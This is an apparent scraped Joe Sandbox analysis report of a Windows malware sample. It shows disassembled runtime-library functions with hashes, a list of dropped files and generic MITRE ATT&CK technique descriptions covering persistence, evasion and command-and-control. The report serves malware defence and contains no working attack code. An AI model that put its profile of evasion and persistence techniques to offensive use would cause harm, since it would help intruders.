Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: C5B0127298030C37DB202586EC03F063F0D97C1BB0F2A0020FA0C1D1F1AAA3B96190CA

Non-executed Functions

Function 00FA10CC Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 00FA1346
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FA135B
UnhandledExceptionFilter.KERNEL32(00FA816C), ref: 00FA1366
GetCurrentProcess.KERNEL32(C0000409), ref: 00FA1382
TerminateProcess.KERNEL32(00000000), ref: 00FA1389

Memory Dump Source

Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true

Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 80cb6fed9a5765316198c520861ae87f97cda69822b37eb2de7ae9cf19d2e755
Instruction ID: 24c73af8898208c1004f5728d38abca7fc10736587f9323a64a5b23deb5c1e8a
Opcode Fuzzy Hash: 80cb6fed9a5765316198c520861ae87f97cda69822b37eb2de7ae9cf19d2e755
Instruction Fuzzy Hash: 3A21DFF491020CDFD791DF28FD446543BB4BB0A352F00901AE58897A60EBB8998DEF46

Function 00FA21E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00FA9458,0000000C,00FA2320,00000000,00000000,?,00FA174F,00000003,?,?,?,?,?,?,00FA10F6), ref: 00FA21F7
__crt_waiting_on_module_handle.LIBCMT ref: 00FA2202

Part of subcall function 00FA13E1: Sleep.KERNEL32(000003E8,00000000,?,00FA2148,KERNEL32.DLL,?,00FA2194,?,00FA174F,00000003), ref: 00FA13ED
Part of subcall function 00FA13E1: GetModuleHandleW.KERNEL32(?,?,00FA2148,KERNEL32.DLL,?,00FA2194,?,00FA174F,00000003,?,?,?,?,?,?,00FA10F6), ref: 00FA13F6

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00FA222B
GetProcAddress.KERNEL32(?,DecodePointer), ref: 00FA223B
__lock.LIBCMT ref: 00FA225D
InterlockedIncrement.KERNEL32(00FAA4D8), ref: 00FA226A
__lock.LIBCMT ref: 00FA227E
___addlocaleref.LIBCMT ref: 00FA229C

Strings

EncodePointer, xrefs: 00FA221F
KERNEL32.DLL, xrefs: 00FA21F1, 00FA21F6, 00FA2201
DecodePointer, xrefs: 00FA2233

Memory Dump Source

Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true

Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: fb925a2e32ce6ea2d8a77a5e6ed770323c79d4fc201df777c6a526097d30b5da
Instruction ID: 0f95001a6c215fd37847fd4a1062fc35c535a703a28baee1f539ed23d713ff16
Opcode Fuzzy Hash: fb925a2e32ce6ea2d8a77a5e6ed770323c79d4fc201df777c6a526097d30b5da
Instruction Fuzzy Hash: 7811E4F0A407009FE760EF79DC05B5ABBE0AF16320F104519E499937A1CBB89946FF21

Function 00FA40A0 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00FA40AC

Part of subcall function 00FA2345: __getptd_noexit.LIBCMT ref: 00FA2348
Part of subcall function 00FA2345: __amsg_exit.LIBCMT ref: 00FA2355

__amsg_exit.LIBCMT ref: 00FA40CC
__lock.LIBCMT ref: 00FA40DC
InterlockedDecrement.KERNEL32(?), ref: 00FA40F9
InterlockedIncrement.KERNEL32(02D72B90), ref: 00FA4124

Memory Dump Source

Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true

Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 19be1b95ad761e350d86f06ce2bf6dd55207c9effcba287a7df2e3f193b0c6b0
Instruction ID: 626cb9428b63c78d17ae35704887b23c54254966c9f7504fe62ebc759b57d8c4
Opcode Fuzzy Hash: 19be1b95ad761e350d86f06ce2bf6dd55207c9effcba287a7df2e3f193b0c6b0
Instruction Fuzzy Hash: D801C0F2E016159BCB62AF29880635D7360BF47760F158009F900A7691CBB8BD96FFD2

Function 00FA35EE Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 00FA360C

Part of subcall function 00FA2AA0: __mtinitlocknum.LIBCMT ref: 00FA2AB6
Part of subcall function 00FA2AA0: __amsg_exit.LIBCMT ref: 00FA2AC2
Part of subcall function 00FA2AA0: EnterCriticalSection.KERNEL32(?,?,?,00FA5600,00000004,00FA9628,0000000C,00FA3746,?,?,00000000,00000000,00000000,?,00FA22F7,00000001), ref: 00FA2ACA

___sbh_find_block.LIBCMT ref: 00FA3617
___sbh_free_block.LIBCMT ref: 00FA3626
HeapFree.KERNEL32(00000000,?,00FA9568,0000000C,00FA2A81,00000000,00FA94C8,0000000C,00FA2ABB,?,?,?,00FA5600,00000004,00FA9628,0000000C), ref: 00FA3656
GetLastError.KERNEL32(?,00FA5600,00000004,00FA9628,0000000C,00FA3746,?,?,00000000,00000000,00000000,?,00FA22F7,00000001,00000214), ref: 00FA3667

Memory Dump Source

Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true

Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 6a96134c789a867bb5f8d95a24f738c331c8c11f2d33d2dc77be70b14a63c3ea
Instruction ID: 6167cb8544e29cc843555fa6dbbd275f267e96bedfac49d5c894527704cef6f8
Opcode Fuzzy Hash: 6a96134c789a867bb5f8d95a24f738c331c8c11f2d33d2dc77be70b14a63c3ea
Instruction Fuzzy Hash: 44016DF2E05309BEDB606FB59C06F5E7AB4AF13770F644019F400A6392DB789A40FA59

Function 00FA3E04 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00FA3E10

Part of subcall function 00FA2345: __getptd_noexit.LIBCMT ref: 00FA2348
Part of subcall function 00FA2345: __amsg_exit.LIBCMT ref: 00FA2355

__getptd.LIBCMT ref: 00FA3E27
__amsg_exit.LIBCMT ref: 00FA3E35
__lock.LIBCMT ref: 00FA3E45

Memory Dump Source

Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true

Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: c3ef33aefbe29357f99fd59d424752d58559eb1451a740892c195058c993596e
Instruction ID: a30fab476d251f2113aa4ef60a043b8caabdcaa88aa044bdfd317def3c1a8817
Opcode Fuzzy Hash: c3ef33aefbe29357f99fd59d424752d58559eb1451a740892c195058c993596e
Instruction Fuzzy Hash: 3CF06DF2A013058BD7A0EB78884674D72A0AF4B720F114159B44197291CB7C9A06FA52

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 2749837485743-7684385786.05.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Change of critical system settings

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\2U36F\NroRNr.exe

C:\Program Files (x86)\2U36F\log.src

C:\Program Files (x86)\2U36F\tbcore3U.dll

C:\Program Files (x86)\2U36F\utils.vcxproj

C:\Program Files (x86)\qNHTRl\log.src

C:\Program Files (x86)\qNHTRl\qNHTRl.exe

C:\Program Files (x86)\qNHTRl\tbcore3U.dll

C:\Program Files (x86)\qNHTRl\utils.vcxproj

C:\Users\Public\Music\destopbak.ini

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\FOM-51[1].jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\b[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\s[1].jpg

Windows Analysis Report
2749837485743-7684385786.05.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre